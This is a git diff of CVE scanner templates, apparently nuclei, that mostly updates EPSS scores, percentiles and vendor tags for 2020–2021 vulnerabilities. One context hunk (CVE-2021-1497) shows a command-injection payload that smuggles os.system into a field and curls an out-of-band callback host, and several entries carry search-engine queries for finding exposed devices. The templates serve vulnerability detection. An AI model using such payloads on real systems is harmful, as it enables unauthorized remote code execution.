index bcfcb49256..f3930e5047 100644
--- a/http/cves/2020/CVE-2020-8163.yaml
+++ b/http/cves/2020/CVE-2020-8163.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 8.8
cve-id: CVE-2020-8163
cwe-id: CWE-94
- epss-score: 0.96961
+ epss-score: 0.96847
cpe: cpe:2.3:a:rubyonrails:rails:*:*:*:*:*:*:*:*
+ epss-percentile: 0.99557
metadata:
max-request: 1
vendor: rubyonrails
diff --git a/http/cves/2020/CVE-2020-8191.yaml b/http/cves/2020/CVE-2020-8191.yaml
index cc484cf49d..6c815e1981 100644
--- a/http/cves/2020/CVE-2020-8191.yaml
+++ b/http/cves/2020/CVE-2020-8191.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-79
epss-score: 0.0021
cpe: cpe:2.3:o:citrix:application_delivery_controller_firmware:*:*:*:*:*:*:*:*
+ epss-percentile: 0.58213
metadata:
max-request: 1
vendor: citrix
diff --git a/http/cves/2020/CVE-2020-8193.yaml b/http/cves/2020/CVE-2020-8193.yaml
index 72772deb55..32d7004b9a 100644
--- a/http/cves/2020/CVE-2020-8193.yaml
+++ b/http/cves/2020/CVE-2020-8193.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 6.5
cve-id: CVE-2020-8193
cwe-id: CWE-287,CWE-284
- epss-score: 0.97455
+ epss-score: 0.97454
cpe: cpe:2.3:o:citrix:application_delivery_controller_firmware:*:*:*:*:*:*:*:*
+ epss-percentile: 0.99926
metadata:
max-request: 6
vendor: citrix
diff --git a/http/cves/2020/CVE-2020-8194.yaml b/http/cves/2020/CVE-2020-8194.yaml
index 7371960f70..6446a49d2f 100644
--- a/http/cves/2020/CVE-2020-8194.yaml
+++ b/http/cves/2020/CVE-2020-8194.yaml
@@ -13,8 +13,9 @@ info:
cvss-score: 6.5
cve-id: CVE-2020-8194
cwe-id: CWE-94
- epss-score: 0.97325
+ epss-score: 0.97341
cpe: cpe:2.3:o:citrix:application_delivery_controller_firmware:*:*:*:*:*:*:*:*
+ epss-percentile: 0.99825
metadata:
max-request: 1
vendor: citrix
diff --git a/http/cves/2020/CVE-2020-8209.yaml b/http/cves/2020/CVE-2020-8209.yaml
index 10d054518e..0c5076f287 100644
--- a/http/cves/2020/CVE-2020-8209.yaml
+++ b/http/cves/2020/CVE-2020-8209.yaml
@@ -19,6 +19,7 @@ info:
cwe-id: CWE-22
epss-score: 0.97223
cpe: cpe:2.3:a:citrix:xenmobile_server:*:*:*:*:*:*:*:*
+ epss-percentile: 0.99746
metadata:
max-request: 1
vendor: citrix
diff --git a/http/cves/2020/CVE-2020-8497.yaml b/http/cves/2020/CVE-2020-8497.yaml
index a7d9fe9be5..961c836fcd 100644
--- a/http/cves/2020/CVE-2020-8497.yaml
+++ b/http/cves/2020/CVE-2020-8497.yaml
@@ -15,6 +15,7 @@ info:
cwe-id: CWE-306
epss-score: 0.002
cpe: cpe:2.3:a:artica:pandora_fms:*:*:*:*:*:*:*:*
+ epss-percentile: 0.57104
metadata:
max-request: 1
vendor: artica
diff --git a/http/cves/2020/CVE-2020-8512.yaml b/http/cves/2020/CVE-2020-8512.yaml
index 50114ba1ca..0a354688bf 100644
--- a/http/cves/2020/CVE-2020-8512.yaml
+++ b/http/cves/2020/CVE-2020-8512.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-79
epss-score: 0.0046
cpe: cpe:2.3:a:icewarp:icewarp_server:*:*:*:*:*:*:*:*
+ epss-percentile: 0.72232
metadata:
max-request: 1
shodan-query: title:"icewarp"
diff --git a/http/cves/2020/CVE-2020-8515.yaml b/http/cves/2020/CVE-2020-8515.yaml
index b210dcc95d..f15e61e80d 100644
--- a/http/cves/2020/CVE-2020-8515.yaml
+++ b/http/cves/2020/CVE-2020-8515.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2020-8515
cwe-id: CWE-78
- epss-score: 0.97183
+ epss-score: 0.97144
cpe: cpe:2.3:o:draytek:vigor2960_firmware:1.3.1:beta:*:*:*:*:*:*
+ epss-percentile: 0.99693
metadata:
max-request: 1
vendor: draytek
diff --git a/http/cves/2020/CVE-2020-8641.yaml b/http/cves/2020/CVE-2020-8641.yaml
index 700abb019a..953dada9d5 100644
--- a/http/cves/2020/CVE-2020-8641.yaml
+++ b/http/cves/2020/CVE-2020-8641.yaml
@@ -14,8 +14,9 @@ info:
cvss-score: 8.8
cve-id: CVE-2020-8641
cwe-id: CWE-22
- epss-score: 0.00709
+ epss-score: 0.00796
cpe: cpe:2.3:a:lotus_core_cms_project:lotus_core_cms:1.0.1:*:*:*:*:*:*:*
+ epss-percentile: 0.7943
metadata:
max-request: 1
vendor: lotus_core_cms_project
diff --git a/http/cves/2020/CVE-2020-8644.yaml b/http/cves/2020/CVE-2020-8644.yaml
index 900d1f3a5a..9aea9ac5f6 100644
--- a/http/cves/2020/CVE-2020-8644.yaml
+++ b/http/cves/2020/CVE-2020-8644.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2020-8644
cwe-id: CWE-94
- epss-score: 0.95246
+ epss-score: 0.95415
cpe: cpe:2.3:a:playsms:playsms:*:*:*:*:*:*:*:*
+ epss-percentile: 0.99099
metadata:
max-request: 2
vendor: playsms
diff --git a/http/cves/2020/CVE-2020-8654.yaml b/http/cves/2020/CVE-2020-8654.yaml
index a5b3338a31..6feed9f0b2 100644
--- a/http/cves/2020/CVE-2020-8654.yaml
+++ b/http/cves/2020/CVE-2020-8654.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 8.8
cve-id: CVE-2020-8654
cwe-id: CWE-78
- epss-score: 0.06956
+ epss-score: 0.06605
cpe: cpe:2.3:a:eyesofnetwork:eyesofnetwork:5.3-0:*:*:*:*:*:*:*
+ epss-percentile: 0.92868
metadata:
max-request: 1
vendor: eyesofnetwork
diff --git a/http/cves/2020/CVE-2020-8771.yaml b/http/cves/2020/CVE-2020-8771.yaml
index d6d6fcf5e7..10fd871600 100644
--- a/http/cves/2020/CVE-2020-8771.yaml
+++ b/http/cves/2020/CVE-2020-8771.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-287
epss-score: 0.06142
cpe: cpe:2.3:a:wptimecapsule:wp_time_capsule:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.92596
metadata:
max-request: 2
framework: wordpress
diff --git a/http/cves/2020/CVE-2020-8772.yaml b/http/cves/2020/CVE-2020-8772.yaml
index a99a30f7d6..a660c62ec4 100644
--- a/http/cves/2020/CVE-2020-8772.yaml
+++ b/http/cves/2020/CVE-2020-8772.yaml
@@ -19,6 +19,7 @@ info:
cwe-id: CWE-862
epss-score: 0.96852
cpe: cpe:2.3:a:revmakx:infinitewp_client:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.9956
metadata:
max-request: 2
verified: true
diff --git a/http/cves/2020/CVE-2020-8813.yaml b/http/cves/2020/CVE-2020-8813.yaml
index b2b8830eeb..25cdeffd9b 100644
--- a/http/cves/2020/CVE-2020-8813.yaml
+++ b/http/cves/2020/CVE-2020-8813.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 8.8
cve-id: CVE-2020-8813
cwe-id: CWE-78
- epss-score: 0.96233
+ epss-score: 0.96358
cpe: cpe:2.3:a:cacti:cacti:1.2.8:*:*:*:*:*:*:*
+ epss-percentile: 0.99352
metadata:
max-request: 1
vendor: cacti
diff --git a/http/cves/2020/CVE-2020-8982.yaml b/http/cves/2020/CVE-2020-8982.yaml
index ba140a5f9b..0c45fb4b53 100644
--- a/http/cves/2020/CVE-2020-8982.yaml
+++ b/http/cves/2020/CVE-2020-8982.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 7.5
cve-id: CVE-2020-8982
cwe-id: CWE-22
- epss-score: 0.68883
+ epss-score: 0.80263
cpe: cpe:2.3:a:citrix:sharefile_storagezones_controller:*:*:*:*:*:*:*:*
+ epss-percentile: 0.97886
metadata:
max-request: 1
vendor: citrix
diff --git a/http/cves/2020/CVE-2020-9036.yaml b/http/cves/2020/CVE-2020-9036.yaml
index e52dde8a6b..1b7f6ecceb 100644
--- a/http/cves/2020/CVE-2020-9036.yaml
+++ b/http/cves/2020/CVE-2020-9036.yaml
@@ -15,6 +15,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00113
cpe: cpe:2.3:a:jeedom:jeedom:*:*:*:*:*:*:*:*
+ epss-percentile: 0.44064
metadata:
max-request: 1
vendor: jeedom
diff --git a/http/cves/2020/CVE-2020-9043.yaml b/http/cves/2020/CVE-2020-9043.yaml
index 3a9dbce086..f65a4be134 100644
--- a/http/cves/2020/CVE-2020-9043.yaml
+++ b/http/cves/2020/CVE-2020-9043.yaml
@@ -17,8 +17,9 @@ info:
cvss-score: 8.8
cve-id: CVE-2020-9043
cwe-id: CWE-200
- epss-score: 0.03474
+ epss-score: 0.04173
cpe: cpe:2.3:a:wpcentral:wpcentral:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.91091
metadata:
max-request: 4
verified: true
diff --git a/http/cves/2020/CVE-2020-9047.yaml b/http/cves/2020/CVE-2020-9047.yaml
index f5c4057aa7..f92e7f7b29 100644
--- a/http/cves/2020/CVE-2020-9047.yaml
+++ b/http/cves/2020/CVE-2020-9047.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 7.2
cve-id: CVE-2020-9047
cwe-id: CWE-347
- epss-score: 0.01324
+ epss-score: 0.01182
cpe: cpe:2.3:a:johnsoncontrols:exacqvision_enterprise_manager:*:*:*:*:*:*:*:*
+ epss-percentile: 0.83293
metadata:
max-request: 1
vendor: johnsoncontrols
diff --git a/http/cves/2020/CVE-2020-9054.yaml b/http/cves/2020/CVE-2020-9054.yaml
index dabe7e9566..5ce0e5d7c7 100644
--- a/http/cves/2020/CVE-2020-9054.yaml
+++ b/http/cves/2020/CVE-2020-9054.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2020-9054
cwe-id: CWE-78
- epss-score: 0.97373
+ epss-score: 0.97346
cpe: cpe:2.3:o:zyxel:nas326_firmware:*:*:*:*:*:*:*:*
+ epss-percentile: 0.99831
metadata:
max-request: 1
vendor: zyxel
diff --git a/http/cves/2020/CVE-2020-9315.yaml b/http/cves/2020/CVE-2020-9315.yaml
index 69927a61b9..ec0806dd66 100644
--- a/http/cves/2020/CVE-2020-9315.yaml
+++ b/http/cves/2020/CVE-2020-9315.yaml
@@ -19,6 +19,7 @@ info:
cwe-id: CWE-306
epss-score: 0.97417
cpe: cpe:2.3:a:oracle:iplanet_web_server:*:*:*:*:*:*:*:*
+ epss-percentile: 0.99889
metadata:
max-request: 2
vendor: oracle
diff --git a/http/cves/2020/CVE-2020-9344.yaml b/http/cves/2020/CVE-2020-9344.yaml
index 31d793a0a0..e13009bbcf 100644
--- a/http/cves/2020/CVE-2020-9344.yaml
+++ b/http/cves/2020/CVE-2020-9344.yaml
@@ -15,12 +15,15 @@ info:
cvss-score: 6.1
cve-id: CVE-2020-9344
cwe-id: CWE-79
- cpe: cpe:2.3:a:atlassian:subversion_application_lifecycle_management:*:*:*:*:*:*:*:*
epss-score: 0.00205
+ cpe: cpe:2.3:a:atlassian:subversion_application_lifecycle_management:*:*:*:*:*:*:*:*
+ epss-percentile: 0.57744
metadata:
max-request: 5
verified: true
shodan-query: http.component:"Atlassian Jira"
+ vendor: atlassian
+ product: subversion_application_lifecycle_management
tags: cve,cve2020,atlassian,jira,xss
http:
@@ -50,4 +53,4 @@ http:
- type: status
status:
- - 200
\ No newline at end of file
+ - 200
diff --git a/http/cves/2020/CVE-2020-9376.yaml b/http/cves/2020/CVE-2020-9376.yaml
index f709cb489c..38c375ceb1 100644
--- a/http/cves/2020/CVE-2020-9376.yaml
+++ b/http/cves/2020/CVE-2020-9376.yaml
@@ -19,6 +19,7 @@ info:
cwe-id: CWE-74
epss-score: 0.9701
cpe: cpe:2.3:o:dlink:dir-610_firmware:-:*:*:*:*:*:*:*
+ epss-percentile: 0.99626
metadata:
max-request: 1
vendor: dlink
diff --git a/http/cves/2020/CVE-2020-9402.yaml b/http/cves/2020/CVE-2020-9402.yaml
index 86757fef04..e0c29211b9 100644
--- a/http/cves/2020/CVE-2020-9402.yaml
+++ b/http/cves/2020/CVE-2020-9402.yaml
@@ -17,8 +17,9 @@ info:
cvss-score: 8.8
cve-id: CVE-2020-9402
cwe-id: CWE-89
- epss-score: 0.24943
+ epss-score: 0.31262
cpe: cpe:2.3:a:djangoproject:django:*:*:*:*:*:*:*:*
+ epss-percentile: 0.96404
metadata:
max-request: 1
vendor: djangoproject
diff --git a/http/cves/2020/CVE-2020-9425.yaml b/http/cves/2020/CVE-2020-9425.yaml
index faed206423..8a6b69ecb2 100644
--- a/http/cves/2020/CVE-2020-9425.yaml
+++ b/http/cves/2020/CVE-2020-9425.yaml
@@ -14,8 +14,9 @@ info:
cvss-score: 7.5
cve-id: CVE-2020-9425
cwe-id: CWE-670
- epss-score: 0.01597
+ epss-score: 0.01611
cpe: cpe:2.3:a:rconfig:rconfig:*:*:*:*:*:*:*:*
+ epss-percentile: 0.85844
metadata:
max-request: 1
vendor: rconfig
diff --git a/http/cves/2020/CVE-2020-9483.yaml b/http/cves/2020/CVE-2020-9483.yaml
index 6db2244023..060f52fddf 100644
--- a/http/cves/2020/CVE-2020-9483.yaml
+++ b/http/cves/2020/CVE-2020-9483.yaml
@@ -14,8 +14,9 @@ info:
cvss-score: 7.5
cve-id: CVE-2020-9483
cwe-id: CWE-89
- epss-score: 0.06219
+ epss-score: 0.05987
cpe: cpe:2.3:a:apache:skywalking:*:*:*:*:*:*:*:*
+ epss-percentile: 0.92516
metadata:
max-request: 1
vendor: apache
diff --git a/http/cves/2020/CVE-2020-9484.yaml b/http/cves/2020/CVE-2020-9484.yaml
index 3bf98ada89..8609d28b04 100644
--- a/http/cves/2020/CVE-2020-9484.yaml
+++ b/http/cves/2020/CVE-2020-9484.yaml
@@ -22,8 +22,9 @@ info:
cvss-score: 7
cve-id: CVE-2020-9484
cwe-id: CWE-502
- epss-score: 0.96967
+ epss-score: 0.97119
cpe: cpe:2.3:a:apache:tomcat:*:*:*:*:*:*:*:*
+ epss-percentile: 0.9968
metadata:
max-request: 1
shodan-query: title:"Apache Tomcat"
diff --git a/http/cves/2020/CVE-2020-9496.yaml b/http/cves/2020/CVE-2020-9496.yaml
index f8117c4c27..7368c19433 100644
--- a/http/cves/2020/CVE-2020-9496.yaml
+++ b/http/cves/2020/CVE-2020-9496.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 6.1
cve-id: CVE-2020-9496
cwe-id: CWE-502
- epss-score: 0.97505
+ epss-score: 0.975
cpe: cpe:2.3:a:apache:ofbiz:17.12.03:*:*:*:*:*:*:*
+ epss-percentile: 0.99963
metadata:
max-request: 1
vendor: apache
diff --git a/http/cves/2020/CVE-2020-9757.yaml b/http/cves/2020/CVE-2020-9757.yaml
index 919a4e7260..0d11179600 100644
--- a/http/cves/2020/CVE-2020-9757.yaml
+++ b/http/cves/2020/CVE-2020-9757.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2020-9757
cwe-id: CWE-74
- epss-score: 0.97362
+ epss-score: 0.97161
cpe: cpe:2.3:a:craftcms:craft_cms:*:*:*:*:*:*:*:*
+ epss-percentile: 0.99705
metadata:
max-request: 2
vendor: craftcms
diff --git a/http/cves/2021/CVE-2021-1472.yaml b/http/cves/2021/CVE-2021-1472.yaml
index fa31156404..c0db99bccf 100644
--- a/http/cves/2021/CVE-2021-1472.yaml
+++ b/http/cves/2021/CVE-2021-1472.yaml
@@ -16,9 +16,10 @@ info:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2021-1472
- cwe-id: CWE-287,CWE-119
- epss-score: 0.97207
+ cwe-id: CWE-119,CWE-287
+ epss-score: 0.97285
cpe: cpe:2.3:o:cisco:rv160_firmware:*:*:*:*:*:*:*:*
+ epss-percentile: 0.99783
metadata:
max-request: 1
shodan-query: http.html:"Cisco rv340"
diff --git a/http/cves/2021/CVE-2021-1497.yaml b/http/cves/2021/CVE-2021-1497.yaml
index 091d68da54..b4ca3538a3 100644
--- a/http/cves/2021/CVE-2021-1497.yaml
+++ b/http/cves/2021/CVE-2021-1497.yaml
@@ -20,12 +20,12 @@ info:
cwe-id: CWE-78
epss-score: 0.97531
cpe: cpe:2.3:o:cisco:hyperflex_hx_data_platform:4.0\(2a\):*:*:*:*:*:*:*
+ epss-percentile: 0.99984
metadata:
max-request: 2
vendor: cisco
product: hyperflex_hx_data_platform
tags: cve,cve2021,cisco,rce,oast,kev,packetstorm
-
variables:
cmd: 'curl http://{{interactsh-url}} -H \"User-Agent: {{useragent}}\"'
payload: '123",""$6$$)); import os;os.system("{{cmd}}");print(crypt.crypt("'
diff --git a/http/cves/2021/CVE-2021-1498.yaml b/http/cves/2021/CVE-2021-1498.yaml
index 50aaf42700..b3df34df0e 100644
--- a/http/cves/2021/CVE-2021-1498.yaml
+++ b/http/cves/2021/CVE-2021-1498.yaml
@@ -20,6 +20,7 @@ info:
cwe-id: CWE-78
epss-score: 0.97531
cpe: cpe:2.3:o:cisco:hyperflex_hx_data_platform:*:*:*:*:*:*:*:*
+ epss-percentile: 0.99984
metadata:
max-request: 1
vendor: cisco
diff --git a/http/cves/2021/CVE-2021-1499.yaml b/http/cves/2021/CVE-2021-1499.yaml
index 3e9257fd2d..5bee672311 100644
--- a/http/cves/2021/CVE-2021-1499.yaml
+++ b/http/cves/2021/CVE-2021-1499.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-306
epss-score: 0.97246
cpe: cpe:2.3:o:cisco:hyperflex_hx_data_platform:*:*:*:*:*:*:*:*
+ epss-percentile: 0.99761
metadata:
max-request: 1
vendor: cisco
diff --git a/http/cves/2021/CVE-2021-20031.yaml b/http/cves/2021/CVE-2021-20031.yaml
index 21af5167f2..db89a1998e 100644
--- a/http/cves/2021/CVE-2021-20031.yaml
+++ b/http/cves/2021/CVE-2021-20031.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-601
epss-score: 0.01202
cpe: cpe:2.3:o:sonicwall:sonicos:*:*:*:*:*:*:*:*
+ epss-percentile: 0.83464
metadata:
max-request: 1
google-query: inurl:"auth.html" intitle:"SonicWall"
diff --git a/http/cves/2021/CVE-2021-20038.yaml b/http/cves/2021/CVE-2021-20038.yaml
index d2f6e66805..2e4bae8912 100644
--- a/http/cves/2021/CVE-2021-20038.yaml
+++ b/http/cves/2021/CVE-2021-20038.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2021-20038
cwe-id: CWE-787,CWE-121
- epss-score: 0.95255
+ epss-score: 0.96076
cpe: cpe:2.3:o:sonicwall:sma_200_firmware:10.2.0.8-37sv:*:*:*:*:*:*:*
+ epss-percentile: 0.99265
metadata:
max-request: 2
vendor: sonicwall
diff --git a/http/cves/2021/CVE-2021-20090.yaml b/http/cves/2021/CVE-2021-20090.yaml
index 8c724d6aa2..11b4a2f593 100644
--- a/http/cves/2021/CVE-2021-20090.yaml
+++ b/http/cves/2021/CVE-2021-20090.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2021-20090
cwe-id: CWE-22
- epss-score: 0.97395
+ epss-score: 0.97441
cpe: cpe:2.3:o:buffalo:wsr-2533dhpl2-bk_firmware:*:*:*:*:*:*:*:*
+ epss-percentile: 0.99913
metadata:
max-request: 1
vendor: buffalo
diff --git a/http/cves/2021/CVE-2021-20091.yaml b/http/cves/2021/CVE-2021-20091.yaml
index 017f3de2d0..4fe2e753aa 100644
--- a/http/cves/2021/CVE-2021-20091.yaml
+++ b/http/cves/2021/CVE-2021-20091.yaml
@@ -15,8 +15,9 @@ info:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.8
cve-id: CVE-2021-20091
- epss-score: 0.00988
+ epss-score: 0.00814
cpe: cpe:2.3:o:buffalo:wsr-2533dhpl2-bk_firmware:*:*:*:*:*:*:*:*
+ epss-percentile: 0.79621
metadata:
max-request: 2
vendor: buffalo
diff --git a/http/cves/2021/CVE-2021-20092.yaml b/http/cves/2021/CVE-2021-20092.yaml
index f77aa114ce..dc02072894 100644
--- a/http/cves/2021/CVE-2021-20092.yaml
+++ b/http/cves/2021/CVE-2021-20092.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 7.5
cve-id: CVE-2021-20092
cwe-id: CWE-287
- epss-score: 0.01281
+ epss-score: 0.01372
cpe: cpe:2.3:o:buffalo:wsr-2533dhpl2-bk_firmware:*:*:*:*:*:*:*:*
+ epss-percentile: 0.84606
metadata:
max-request: 2
vendor: buffalo
diff --git a/http/cves/2021/CVE-2021-20114.yaml b/http/cves/2021/CVE-2021-20114.yaml
index 95c2a1bbc7..76c35a9adc 100644
--- a/http/cves/2021/CVE-2021-20114.yaml
+++ b/http/cves/2021/CVE-2021-20114.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-425
epss-score: 0.0178
cpe: cpe:2.3:a:tecnick:tcexam:*:*:*:*:*:*:*:*
+ epss-percentile: 0.86493
metadata:
max-request: 1
vendor: tecnick
diff --git a/http/cves/2021/CVE-2021-20123.yaml b/http/cves/2021/CVE-2021-20123.yaml
index 79e6d08cab..23c6ed4247 100644
--- a/http/cves/2021/CVE-2021-20123.yaml
+++ b/http/cves/2021/CVE-2021-20123.yaml
@@ -14,8 +14,9 @@ info:
cvss-score: 7.5
cve-id: CVE-2021-20123
cwe-id: CWE-22
- epss-score: 0.02801
+ epss-score: 0.05307
cpe: cpe:2.3:a:draytek:vigorconnect:1.6.0:beta3:*:*:*:*:*:*
+ epss-percentile: 0.92084
metadata:
max-request: 2
verified: true
diff --git a/http/cves/2021/CVE-2021-20124.yaml b/http/cves/2021/CVE-2021-20124.yaml
index b853f8c6e3..9e1fe0540e 100644
--- a/http/cves/2021/CVE-2021-20124.yaml
+++ b/http/cves/2021/CVE-2021-20124.yaml
@@ -14,8 +14,9 @@ info:
cvss-score: 7.5
cve-id: CVE-2021-20124
cwe-id: CWE-22
- epss-score: 0.01106
+ epss-score: 0.02141
cpe: cpe:2.3:a:draytek:vigorconnect:1.6.0:beta3:*:*:*:*:*:*
+ epss-percentile: 0.87833
metadata:
max-request: 2
verified: true
diff --git a/http/cves/2021/CVE-2021-20137.yaml b/http/cves/2021/CVE-2021-20137.yaml
index 580543df76..2349bb462f 100644
--- a/http/cves/2021/CVE-2021-20137.yaml
+++ b/http/cves/2021/CVE-2021-20137.yaml
@@ -14,8 +14,9 @@ info:
cvss-score: 6.1
cve-id: CVE-2021-20137
cwe-id: CWE-79
- epss-score: 0.31136
+ epss-score: 0.3285
cpe: cpe:2.3:o:gryphonconnect:gryphon_tower_firmware:*:*:*:*:*:*:*:*
+ epss-percentile: 0.96459
metadata:
max-request: 1
vendor: gryphonconnect
diff --git a/http/cves/2021/CVE-2021-20150.yaml b/http/cves/2021/CVE-2021-20150.yaml
index 4a347f5477..81455435b1 100644
--- a/http/cves/2021/CVE-2021-20150.yaml
+++ b/http/cves/2021/CVE-2021-20150.yaml
@@ -13,8 +13,9 @@ info:
cvss-score: 5.3
cve-id: CVE-2021-20150
cwe-id: CWE-306
- epss-score: 0.21132
+ epss-score: 0.16176
cpe: cpe:2.3:o:trendnet:tew-827dru_firmware:2.08b01:*:*:*:*:*:*:*
+ epss-percentile: 0.95283
metadata:
max-request: 1
shodan-query: http.html:"TEW-827DRU"
diff --git a/http/cves/2021/CVE-2021-20158.yaml b/http/cves/2021/CVE-2021-20158.yaml
index bb82b024da..dc8fd28d25 100644
--- a/http/cves/2021/CVE-2021-20158.yaml
+++ b/http/cves/2021/CVE-2021-20158.yaml
@@ -13,15 +13,15 @@ info:
cvss-score: 9.8
cve-id: CVE-2021-20158
cwe-id: CWE-306
- epss-score: 0.01167
+ epss-score: 0.01211
cpe: cpe:2.3:o:trendnet:tew-827dru_firmware:2.08b01:*:*:*:*:*:*:*
+ epss-percentile: 0.83527
metadata:
max-request: 2
shodan-query: http.html:"TEW-827DRU"
vendor: trendnet
product: tew-827dru_firmware
tags: disclosure,router,intrusive,tenable,cve,cve2021,trendnet
-
variables:
password: "{{rand_base(6)}}"
diff --git a/http/cves/2021/CVE-2021-20167.yaml b/http/cves/2021/CVE-2021-20167.yaml
index c4a1646291..72554c56b8 100644
--- a/http/cves/2021/CVE-2021-20167.yaml
+++ b/http/cves/2021/CVE-2021-20167.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 8
cve-id: CVE-2021-20167
cwe-id: CWE-77
- epss-score: 0.95513
+ epss-score: 0.95111
cpe: cpe:2.3:o:netgear:rax43_firmware:1.0.3.96:*:*:*:*:*:*:*
+ epss-percentile: 0.99023
metadata:
max-request: 1
vendor: netgear
diff --git a/http/cves/2021/CVE-2021-20323.yaml b/http/cves/2021/CVE-2021-20323.yaml
index 990436c5e5..ef9fedbb87 100644
--- a/http/cves/2021/CVE-2021-20323.yaml
+++ b/http/cves/2021/CVE-2021-20323.yaml
@@ -18,8 +18,9 @@ info:
cvss-score: 6.1
cve-id: CVE-2021-20323
cwe-id: CWE-79
- epss-score: 0.0018
+ epss-score: 0.00222
cpe: cpe:2.3:a:redhat:keycloak:*:*:*:*:*:*:*:*
+ epss-percentile: 0.59851
metadata:
max-request: 4
shodan-query: html:"Keycloak"
diff --git a/http/cves/2021/CVE-2021-20792.yaml b/http/cves/2021/CVE-2021-20792.yaml
index 0246e6f6bf..b83b87d186 100644
--- a/http/cves/2021/CVE-2021-20792.yaml
+++ b/http/cves/2021/CVE-2021-20792.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-79
epss-score: 0.002
cpe: cpe:2.3:a:expresstech:quiz_and_survey_master:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.57161
metadata:
max-request: 2
framework: wordpress
diff --git a/http/cves/2021/CVE-2021-20837.yaml b/http/cves/2021/CVE-2021-20837.yaml
index b2db6836ca..77571974a0 100644
--- a/http/cves/2021/CVE-2021-20837.yaml
+++ b/http/cves/2021/CVE-2021-20837.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2021-20837
cwe-id: CWE-78
- epss-score: 0.97185
+ epss-score: 0.97158
cpe: cpe:2.3:a:sixapart:movable_type:*:*:*:*:premium:*:*:*
+ epss-percentile: 0.99701
metadata:
max-request: 1
vendor: sixapart
diff --git a/http/cves/2021/CVE-2021-21087.yaml b/http/cves/2021/CVE-2021-21087.yaml
index 0af820cdc8..99bcc230ed 100644
--- a/http/cves/2021/CVE-2021-21087.yaml
+++ b/http/cves/2021/CVE-2021-21087.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00145
cpe: cpe:2.3:a:adobe:coldfusion:2016:-:*:*:*:*:*:*
+ epss-percentile: 0.49708
metadata:
max-request: 7
shodan-query: http.component:"Adobe ColdFusion"
@@ -36,6 +37,7 @@ http:
- "{{BaseURL}}/cfmx/CFIDE/scripts/ajax/package/cfajax.js"
stop-at-first-match: true
+
matchers-condition: and
matchers:
- type: regex
diff --git a/http/cves/2021/CVE-2021-21234.yaml b/http/cves/2021/CVE-2021-21234.yaml
index b7be8172ec..17b55dc513 100644
--- a/http/cves/2021/CVE-2021-21234.yaml
+++ b/http/cves/2021/CVE-2021-21234.yaml
@@ -17,8 +17,9 @@ info:
cvss-score: 7.7
cve-id: CVE-2021-21234
cwe-id: CWE-22
- epss-score: 0.97093
+ epss-score: 0.97064
cpe: cpe:2.3:a:spring-boot-actuator-logview_project:spring-boot-actuator-logview:*:*:*:*:*:*:*:*
+ epss-percentile: 0.99653
metadata:
max-request: 4
vendor: spring-boot-actuator-logview_project
diff --git a/http/cves/2021/CVE-2021-21287.yaml b/http/cves/2021/CVE-2021-21287.yaml
index 79f2b56c5e..28f99a1c65 100644
--- a/http/cves/2021/CVE-2021-21287.yaml
+++ b/http/cves/2021/CVE-2021-21287.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 7.7
cve-id: CVE-2021-21287
cwe-id: CWE-918
- epss-score: 0.9729
+ epss-score: 0.97296
cpe: cpe:2.3:a:minio:minio:*:*:*:*:*:*:*:*
+ epss-percentile: 0.99792
metadata:
max-request: 1
vendor: minio
diff --git a/http/cves/2021/CVE-2021-21307.yaml b/http/cves/2021/CVE-2021-21307.yaml
index 5e63083438..dbb3816a4b 100644
--- a/http/cves/2021/CVE-2021-21307.yaml
+++ b/http/cves/2021/CVE-2021-21307.yaml
@@ -17,8 +17,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2021-21307
cwe-id: CWE-862
- epss-score: 0.97319
+ epss-score: 0.973
cpe: cpe:2.3:a:lucee:lucee_server:*:*:*:*:*:*:*:*
+ epss-percentile: 0.99795
metadata:
max-request: 3
vendor: lucee
diff --git a/http/cves/2021/CVE-2021-21311.yaml b/http/cves/2021/CVE-2021-21311.yaml
index ca4b90a97c..c12f41757e 100644
--- a/http/cves/2021/CVE-2021-21311.yaml
+++ b/http/cves/2021/CVE-2021-21311.yaml
@@ -19,6 +19,7 @@ info:
cwe-id: CWE-918
epss-score: 0.00795
cpe: cpe:2.3:a:adminer:adminer:*:*:*:*:*:*:*:*
+ epss-percentile: 0.79414
metadata:
max-request: 6
fofa-query: app="Adminer" && body="4.7.8"
diff --git a/http/cves/2021/CVE-2021-21315.yaml b/http/cves/2021/CVE-2021-21315.yaml
index 0f213abfb5..837b1d4205 100644
--- a/http/cves/2021/CVE-2021-21315.yaml
